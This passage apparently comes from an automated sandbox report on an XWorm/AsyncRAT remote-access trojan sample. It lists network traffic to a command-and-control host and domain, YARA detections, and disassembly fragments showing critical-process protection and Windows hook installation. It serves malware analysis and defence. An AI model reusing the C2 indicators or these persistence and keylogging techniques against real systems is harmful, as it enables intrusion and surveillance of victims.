                                          Nov 1, 2024 17:34:56.780932903 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.858128071 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.863315105 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.935892105 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.940990925 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:56.967082977 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:56.972870111 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.076507092 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.082726955 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.092350960 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.097394943 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.686577082 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.922655106 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:34:57.922738075 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:34:57.928939104 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:01.107830048 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:01.113015890 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:05.124253035 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:05.124326944 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.108619928 CET500252620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.108617067 CET500242620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.113920927 CET262050025147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:06.113938093 CET262050024147.185.221.23192.168.2.4
                                          Nov 1, 2024 17:35:06.114131927 CET500252620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.268313885 CET500252620192.168.2.4147.185.221.23
                                          Nov 1, 2024 17:35:06.273886919 CET262050025147.185.221.23192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 1, 2024 17:31:05.496584892 CET6389853192.168.2.41.1.1.1
                                          Nov 1, 2024 17:31:05.622852087 CET53638981.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Nov 1, 2024 17:31:05.496584892 CET192.168.2.41.1.1.10xb7d6Standard query (0)browser-hazard.gl.at.ply.ggA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Nov 1, 2024 17:31:05.622852087 CET1.1.1.1192.168.2.40xb7d6No error (0)browser-hazard.gl.at.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:12:30:55
                                          Start date:01/11/2024
                                          Path:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe"
                                          Imagebase:0xc50000
                                          File size:154'624 bytes
                                          MD5 hash:FB84F0C948174966776DB1E4592FDC75
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:20.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 4314 7ffd9b88227d 4315 7ffd9b8822af RtlSetProcessIsCritical 4314->4315 4317 7ffd9b882362 4315->4317 4310 7ffd9b8827a8 4311 7ffd9b8827b1 SetWindowsHookExW 4310->4311 4313 7ffd9b882881 4311->4313

                                            Executed Functions

                                            Function 00007FFD9B8805A8 Relevance: 2.0, Strings: 1, Instructions: 716COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CAO_^
                                            • API String ID: 0-3111533842
                                            • Opcode ID: 3ac7834d607379049ebae022b5c56a4311dc38dddbcb7aa12da9a87a5e59eeef
                                            • Instruction ID: acff2d001eefb20c547e742205ea78c0c5619abd93bc407a481b8ab5ac7b8a40
                                            • Opcode Fuzzy Hash: 3ac7834d607379049ebae022b5c56a4311dc38dddbcb7aa12da9a87a5e59eeef
                                            • Instruction Fuzzy Hash: 08220920B29E494FE7A8FB788865AB977D2EF9C704F44007DE45DC32D6DE38A9418781
                                            Function 00007FFD9B8889B6 Relevance: .5, Instructions: 472COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 344 7ffd9b8889b6-7ffd9b8889c3 345 7ffd9b8889c5-7ffd9b8889cd 344->345 346 7ffd9b8889ce-7ffd9b888a97 344->346 345->346 349 7ffd9b888a99-7ffd9b888aa2 346->349 350 7ffd9b888b03 346->350 349->350 351 7ffd9b888aa4-7ffd9b888ab0 349->351 352 7ffd9b888b05-7ffd9b888b2a 350->352 353 7ffd9b888ae9-7ffd9b888b01 351->353 354 7ffd9b888ab2-7ffd9b888ac4 351->354 358 7ffd9b888b96 352->358 359 7ffd9b888b2c-7ffd9b888b35 352->359 353->352 356 7ffd9b888ac6 354->356 357 7ffd9b888ac8-7ffd9b888adb 354->357 356->357 357->357 360 7ffd9b888add-7ffd9b888ae5 357->360 362 7ffd9b888b98-7ffd9b888c40 358->362 359->358 361 7ffd9b888b37-7ffd9b888b43 359->361 360->353 363 7ffd9b888b45-7ffd9b888b57 361->363 364 7ffd9b888b7c-7ffd9b888b94 361->364 373 7ffd9b888cae 362->373 374 7ffd9b888c42-7ffd9b888c4c 362->374 365 7ffd9b888b59 363->365 366 7ffd9b888b5b-7ffd9b888b6e 363->366 364->362 365->366 366->366 368 7ffd9b888b70-7ffd9b888b78 366->368 368->364 376 7ffd9b888cb0-7ffd9b888cd9 373->376 374->373 375 7ffd9b888c4e-7ffd9b888c5b 374->375 377 7ffd9b888c5d-7ffd9b888c6f 375->377 378 7ffd9b888c94-7ffd9b888cac 375->378 383 7ffd9b888cdb-7ffd9b888ce6 376->383 384 7ffd9b888d43 376->384 379 7ffd9b888c71 377->379 380 7ffd9b888c73-7ffd9b888c86 377->380 378->376 379->380 380->380 382 7ffd9b888c88-7ffd9b888c90 380->382 382->378 383->384 386 7ffd9b888ce8-7ffd9b888cf6 383->386 385 7ffd9b888d45-7ffd9b888dd6 384->385 394 7ffd9b888ddc-7ffd9b888deb 385->394 387 7ffd9b888cf8-7ffd9b888d0a 386->387 388 7ffd9b888d2f-7ffd9b888d41 386->388 389 7ffd9b888d0c 387->389 390 7ffd9b888d0e-7ffd9b888d21 387->390 388->385 389->390 390->390 392 7ffd9b888d23-7ffd9b888d2b 390->392 392->388 395 7ffd9b888ded 394->395 396 7ffd9b888df3-7ffd9b888e58 call 7ffd9b888e74 394->396 395->396 403 7ffd9b888e5a 396->403 404 7ffd9b888e5f-7ffd9b888e73 396->404 403->404
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a93352d3994c8dd454a0abc9848ee8b1b4eb3b25520a3133065e037ac5d24913
                                            • Instruction ID: bfe0d1d491e14ef2faac7a99055f9e245d6e1da8aba38e98b7bc74520757d1f6
                                            • Opcode Fuzzy Hash: a93352d3994c8dd454a0abc9848ee8b1b4eb3b25520a3133065e037ac5d24913
                                            • Instruction Fuzzy Hash: FBF1B830A09E4D8FEBA8DF28D8557E937D1FF58310F04426EE85DC72A5DB34A9458B82
                                            Function 00007FFD9B889762 Relevance: .5, Instructions: 457COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 405 7ffd9b889762-7ffd9b88976f 406 7ffd9b88977a-7ffd9b889847 405->406 407 7ffd9b889771-7ffd9b889779 405->407 410 7ffd9b889849-7ffd9b889852 406->410 411 7ffd9b8898b3 406->411 407->406 410->411 413 7ffd9b889854-7ffd9b889860 410->413 412 7ffd9b8898b5-7ffd9b8898da 411->412 419 7ffd9b889946 412->419 420 7ffd9b8898dc-7ffd9b8898e5 412->420 414 7ffd9b889899-7ffd9b8898b1 413->414 415 7ffd9b889862-7ffd9b889874 413->415 414->412 417 7ffd9b889876 415->417 418 7ffd9b889878-7ffd9b88988b 415->418 417->418 418->418 421 7ffd9b88988d-7ffd9b889895 418->421 423 7ffd9b889948-7ffd9b88996d 419->423 420->419 422 7ffd9b8898e7-7ffd9b8898f3 420->422 421->414 424 7ffd9b8898f5-7ffd9b889907 422->424 425 7ffd9b88992c-7ffd9b889944 422->425 429 7ffd9b8899db 423->429 430 7ffd9b88996f-7ffd9b889979 423->430 426 7ffd9b889909 424->426 427 7ffd9b88990b-7ffd9b88991e 424->427 425->423 426->427 427->427 431 7ffd9b889920-7ffd9b889928 427->431 433 7ffd9b8899dd-7ffd9b889a0b 429->433 430->429 432 7ffd9b88997b-7ffd9b889988 430->432 431->425 434 7ffd9b88998a-7ffd9b88999c 432->434 435 7ffd9b8899c1-7ffd9b8899d9 432->435 440 7ffd9b889a7b 433->440 441 7ffd9b889a0d-7ffd9b889a18 433->441 436 7ffd9b88999e 434->436 437 7ffd9b8899a0-7ffd9b8899b3 434->437 435->433 436->437 437->437 439 7ffd9b8899b5-7ffd9b8899bd 437->439 439->435 442 7ffd9b889a7d-7ffd9b889b55 440->442 441->440 443 7ffd9b889a1a-7ffd9b889a28 441->443 453 7ffd9b889b5b-7ffd9b889b6a 442->453 444 7ffd9b889a2a-7ffd9b889a3c 443->444 445 7ffd9b889a61-7ffd9b889a79 443->445 447 7ffd9b889a3e 444->447 448 7ffd9b889a40-7ffd9b889a53 444->448 445->442 447->448 448->448 449 7ffd9b889a55-7ffd9b889a5d 448->449 449->445 454 7ffd9b889b6c 453->454 455 7ffd9b889b72-7ffd9b889bd4 call 7ffd9b889bf0 453->455 454->455 462 7ffd9b889bd6 455->462 463 7ffd9b889bdb-7ffd9b889bef 455->463 462->463
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 023237a13004678e9f19986a4a5445f4bc8c5b1a152368b36bc6bb072f6aaac8
                                            • Instruction ID: a0925277062244cff6b77ff899d397231f3e2ac0f4c06ef9ef944067d73dd9ab
                                            • Opcode Fuzzy Hash: 023237a13004678e9f19986a4a5445f4bc8c5b1a152368b36bc6bb072f6aaac8
                                            • Instruction Fuzzy Hash: 39E1E630A09A4E8FEBA8DF28C8557E977D1FF58310F04466ED85DC72A5CF74A9418B81
                                            Function 00007FFD9B88227D Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 154 7ffd9b88227d-7ffd9b882360 RtlSetProcessIsCritical 158 7ffd9b882362 154->158 159 7ffd9b882368-7ffd9b88239d 154->159 158->159
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: 4f50b4b715c02cf28ebad9409d0e5fbcfbb9eaeaecb1ae07bb8473c44290a6c5
                                            • Instruction ID: a81e0b93d6b0d6a40a490ff45ce768bf008178b17bb28347e2b18ba83bc7ebd1
                                            • Opcode Fuzzy Hash: 4f50b4b715c02cf28ebad9409d0e5fbcfbb9eaeaecb1ae07bb8473c44290a6c5
                                            • Instruction Fuzzy Hash: 2C41033190C7588FDB18DFA8D855AE9BBF0FF5A310F04416EE09AC3692DB746846CB91
                                            Function 00007FFD9B8827A8 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 161 7ffd9b8827a8-7ffd9b8827af 162 7ffd9b8827b1-7ffd9b8827b9 161->162 163 7ffd9b8827ba-7ffd9b88282d 161->163 162->163 166 7ffd9b882833-7ffd9b882840 163->166 167 7ffd9b8828b9-7ffd9b8828bd 163->167 168 7ffd9b882842-7ffd9b88287f SetWindowsHookExW 166->168 167->168 170 7ffd9b882881 168->170 171 7ffd9b882887-7ffd9b8828b8 168->171 170->171
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4109366724.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af67612922.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: aaf80e8d1b64cd2baf8f88d0905acc365cfc5c8f2915d220b02de6f9235d4414
                                            • Instruction ID: 2b7b11b4a626a4064bef4bd8b7126fa0cfa1f892f6ce95281be727aec2fe8f87
                                            • Opcode Fuzzy Hash: aaf80e8d1b64cd2baf8f88d0905acc365cfc5c8f2915d220b02de6f9235d4414
                                            • Instruction Fuzzy Hash: 94310A30A0CA4D4FDB5CEFAC98566F9BBE1EF59321F00027ED019C3292CA74A85287C1